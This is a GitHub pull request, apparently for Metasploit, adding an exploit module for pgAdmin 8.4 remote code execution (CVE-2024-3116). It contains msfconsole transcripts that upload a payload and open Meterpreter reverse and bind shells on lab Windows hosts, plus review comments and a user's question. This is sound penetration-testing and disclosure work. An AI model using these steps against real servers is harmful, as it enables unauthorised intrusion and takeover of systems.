Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

pgAdmin 8.4 RCE / CVE-2024-3116 #19422

Merged
merged 8 commits into from
Aug 28, 2024
Merged

pgAdmin 8.4 RCE / CVE-2024-3116 #19422

merged 8 commits into from
Aug 28, 2024

Conversation

igomeow
Copy link
Contributor

@igomeow igomeow commented Aug 26, 2024

pgAdmin versions up to 8.4 are vulnerable to a Remote Code Execution (RCE) (CVE-2024-3116) flaw through the validate binary path API.
This vulnerability allows attackers to run arbitrary code on the server hosting pgAdmin, which poses a significant
threat to the integrity of the database management system and the security of its underlying data.

The exploit can be executed in both authenticated and unauthenticated scenarios. When valid credentials are available,
Metasploit can log in to pgAdmin, upload a malicious payload using the file management plugin, and then execute it via
the validate_binary_path endpoint. This vulnerability is specific to Windows targets. If authentication is not required
by the application, Metasploit can directly upload and trigger the payload through the validate_binary_path endpoint.

Verification

pgAdmin 8.4 on Windows (Authenticated)

msf6 exploit(windows/http/pgadmin_binary_path_api) > set RHOSTS 192.168.1.5
RHOSTS => 192.168.1.5
msf6 exploit(windows/http/pgadmin_binary_path_api) > set USERNAME [email protected]
USERNAME => [email protected]
msf6 exploit(windows/http/pgadmin_binary_path_api) > set PASSWORD 123456
PASSWORD => 123456
msf6 exploit(windows/http/pgadmin_binary_path_api) > set LHOST 192.168.1.6 
LHOST => 192.168.1.6
msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit 

[*] Started reverse TCP handler on 192.168.1.6:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. pgAdmin version 8.4.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Payload uploaded to: C:\Users\pgAdmin\Desktop\CVE-2024-3116\pgadmin4\storage\test_test.com/pg_restore.exe
[*] Sending stage (201798 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.5:52588) at 2024-08-26 19:48:10 +0200
[!] This exploit may require manual cleanup of 'C:\Users\pgAdmin\Desktop\CVE-2024-3116\pgadmin4\storage\test_test.com/pg_restore.exe' on the target

meterpreter > sysinfo
Computer        : DESKTOP-FMNV75N
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

pgAdmin 8.4 on Windows (Unauthenticated)

msf6 exploit(windows/http/pgadmin_binary_path_api) > set RHOSTS 192.168.1.7
RHOSTS => 192.168.1.7
msf6 exploit(windows/http/pgadmin_binary_path_api) > set LHOST 192.168.1.6 
LHOST => 192.168.1.6
msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit 

[*] Started reverse TCP handler on 192.168.1.6:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. pgAdmin version 8.4.0 is affected
[*] Payload uploaded to: C:\Users\pgAdmin\pg_restore.exe
[*] Sending stage (200774 bytes) to 192.168.1.7
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.7:55560) at 2024-08-26 19:51:01 +0200
[!] This exploit may require manual cleanup of 'C:\Users\pgAdmin\pg_restore.exe' on the target

meterpreter > sysinfo
Computer        : DESKTOP-HTGS43E
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

@igomeow igomeow changed the title Pg admin8 4 rce pgAdmin 8.4 RCE / CVE-2024-3116 Aug 26, 2024
@adfoster-r7 adfoster-r7 self-assigned this Aug 26, 2024
@adfoster-r7
Copy link
Contributor

@igomeow Just for visibility - we've got a release planned for tomorrow morning, if the PR feedback is applied today then we'd be able to get this landed and shipped in time I think! 🤞

@igomeow
Copy link
Contributor Author

igomeow commented Aug 28, 2024
edited
Loading

@igomeow Just for visibility - we've got a release planned for tomorrow morning, if the PR feedback is applied today then we'd be able to get this landed and shipped in time I think! 🤞

@adfoster-r7 I've processed all feedbacks, hope I have completed it on time.

@adfoster-r7
Copy link
Contributor

testing against 7.4:

msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit rhost=192.168.123.131 rport=5050 lhost=192.168.123.1 [email protected] password=password httptrace=true payload=windows/x64/meterpreter/bind_tcp

...
####################
# Response:
####################
No response received
[*] Started bind TCP handler against 192.168.123.131:4444
[*] Sending stage (201798 bytes) to 192.168.123.131
[*] Meterpreter session 1 opened (192.168.123.1:56994 -> 192.168.123.131:4444) at 2024-08-28 18:43:01 +0100
[!] This exploit may require manual cleanup of 'C:\Users\Administrator\AppData\Roaming\pgAdmin\storage\test_example.com/pg_restore.exe' on the target

meterpreter > getuid
Server username: WIN-E0KMDDFCK37\Administrator
meterpreter >

Looks good to me, thanks! Will land once CI is finished

@adfoster-r7 adfoster-r7 merged commit fabb5d1 into rapid7:master Aug 28, 2024
36 checks passed
@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 28, 2024
@adfoster-r7
Copy link
Contributor

Release Notes

Adds a new module targeting all versions of PgAdmin up to 8.4 which leverages a Remote Code Execution (RCE) CVE-2024-3116 flaw through the validate binary path API.

@Prikass66
Copy link

Hi, i have a question about unauthenticated method. When i trying to exploit the module, msfconsole returns the error:

Exploit aborted due to failure: bad-config: The application requires authentication, please provide valid credentials

I see that you used 2 diffent virtual machines for each scenarios. What difference between pgAdmin configurations on these machines?
Btw, found a small misstake in 3st step of Verification Steps.
Not use exploit/multi/http/pgadmin_binary_path_api
Should be use exploit/windows/http/pgadmin_binary_path_api

@flyingllama87 flyingllama87 mentioned this pull request Aug 31, 2024
Closed
@igomeow
Copy link
Contributor Author

igomeow commented Sep 3, 2024

Hi, i have a question about unauthenticated method. When i trying to exploit the module, msfconsole returns the error:

Exploit aborted due to failure: bad-config: The application requires authentication, please provide valid credentials

I see that you used 2 diffent virtual machines for each scenarios. What difference between pgAdmin configurations on these machines? Btw, found a small misstake in 3st step of Verification Steps. Not use exploit/multi/http/pgadmin_binary_path_api Should be use exploit/windows/http/pgadmin_binary_path_api

Thanks for catching typo in documentation! I will fix it. One server requires username/password, other one doesn't require, to access pgadmin console. In your case, it seems pgadmin requires username/password. So you should provide valid credentials. If pgAdmin doesn't require any creds, please let me know which version it is. I will try to debug the problem.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

@jvoisin jvoisin jvoisin left review comments

Assignees

@adfoster-r7 adfoster-r7

Labels
rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@igomeow @adfoster-r7 @Prikass66 @jvoisin